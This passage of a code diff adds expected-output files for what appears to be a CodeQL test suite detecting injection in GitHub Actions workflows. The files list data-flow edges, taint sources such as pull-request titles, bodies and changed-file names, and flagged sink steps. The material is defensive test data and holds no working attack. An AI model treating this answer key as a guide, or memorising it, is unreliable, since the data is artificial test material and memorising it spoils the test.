.github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:36:5:36:9 | needs | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:38:5:38:9 | steps | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:39:7:40:53 | - id: sink | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:39:9:39:10 | id | .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:7:40:53 | - id: sink | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:39:9:40:53 | id: sink | +cfgNodes +| .github/workflows/test.yml:1:1:40:53 | enter on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +dfNodes +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +exprNodes +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +argumentNodes +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +usesIds +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | source | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | step | +nodeLocations +| .github/workflows/test.yml:1:1:40:53 | on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:19:8:49 | .github/workflows/test.yml@8:19:8:49 | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:19:23:63 | .github/workflows/test.yml@23:19:23:63 | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | +scopes +| .github/workflows/test.yml:1:1:40:53 | on: push | +sources +| ahmadnassri/action-changed-files | * | output.files | pull_request_target | PR changed files | +| ahmadnassri/action-changed-files | * | output.json | pull_request_target | PR changed files | +| dorny/paths-filter | * | output.changes | pull_request_target | PR changed files | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | pull_request_target | PR body | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | pull_request_target | PR title | +| jitterbit/get-changed-files | * | output.added | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.added_modified | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.all | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.deleted | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.modified | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.removed | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.renamed | pull_request_target | PR changed files | +| khan/pull-request-comment-trigger | * | output.comment_body | issue_comment | | +| khan/pull-request-comment-trigger | * | output.comment_body | pull_request_comment | | +| octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | * | Foo | +| tj-actions/branch-names | * | output.current_branch | pull_request_target | PR current branch | +| tj-actions/branch-names | * | output.head_ref_branch | pull_request_target | PR head branch | +| tj-actions/branch-names | * | output.ref_branch | pull_request_target | Branch tirggering workflow run | +| tj-actions/changed-files | * | output.added_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.all_changed_and_modified_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.all_changed_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.all_modified_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.all_old_new_renamed_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.changed_keys | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.copied_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.deleted_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.modified_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.modified_keys | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.other_changed_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.other_deleted_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.other_modified_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.renamed_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.type_changed_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.unknown_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.unmerged_files | pull_request_target | PR changed files | +| tj-actions/verify-changed-files | * | output.changed-files | pull_request_target | PR changed files | +| tzkhan/pr-update-action | * | output.headMatch | pull_request_target | | +| xt0rted/slash-command-action | * | output.command-arguments | issue_comment | | +| xt0rted/slash-command-action | * | output.command-arguments | pull_request_comment | | +summaries +| akhileshns/heroku-deploy | * | input.branch | output.status | taint | +| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | +| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | +| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | +| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | +| ashley-taylor/regex-property-action | * | input.value | output.value | taint | +| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | +| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | +| aszc/change-string-case-action | * | input.string | output.capitalized | taint | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | +| bobheadxi/deployments | * | input.env | output.env | taint | +| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | +| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | +| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | +| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | +| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | +| csexton/release-asset-action | * | input.release-url | output.url | taint | +| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | +| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | +| frabert/replace-string-action | * | input.string | output.replaced | taint | +| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | +| getsentry/action-release | * | input.version | output.version | taint | +| getsentry/action-release | * | input.version_prefix | output.version | taint | +| github/codeql-action | * | input.output | output.sarif-output | taint | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | +| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | +| haya14busa/action-cond | * | input.if_false | output.value | taint | +| haya14busa/action-cond | * | input.if_true | output.value | taint | +| hexlet/project-action | * | input.mount-path | env.PWD | taint | +| jsdaniell/create-json | * | input.dir | output.successfully | taint | +| jsdaniell/create-json | * | input.json | output.successfully | taint | +| jsdaniell/create-json | * | input.name | output.successfully | taint | +| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | +| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | +| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | +| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | +| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | +| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | +| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | +| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | +| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | +| octo-org/summary-repo/.github/workflows/workflow.yml | * | input.config-path | output.workflow-output | taint | +| octo-org/this-repo/.github/workflows/workflow.yml | * | input.config-path | output.workflow-output | taint | +| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | +| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | +| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | +| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | +| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | +| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | +| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | +calls +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | actions/checkout | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | tj-actions/changed-files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | mad9000/actions-find-and-replace-string | +needs +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | diff --git a/ql/src/test/partial.expected b/ql/src/test/partial.expected new file mode 100644 index 00000000000..98aea83de2e --- /dev/null +++ b/ql/src/test/partial.expected @@ -0,0 +1,28 @@ +edges +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | +| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | +| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | +| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | +| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | +#select +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | this source | +| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | this source | +| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | this source | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | diff --git a/ql/src/test/test.expected b/ql/src/test/test.expected new file mode 100644 index 00000000000..5dd2313e851 --- /dev/null +++ b/ql/src/test/test.expected @@ -0,0 +1,152 @@ +edges +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | +| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | +| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | +| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | +| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | +| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | +| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | +| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | +| composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | +| composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | +| composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | +| composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | +nodes +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | 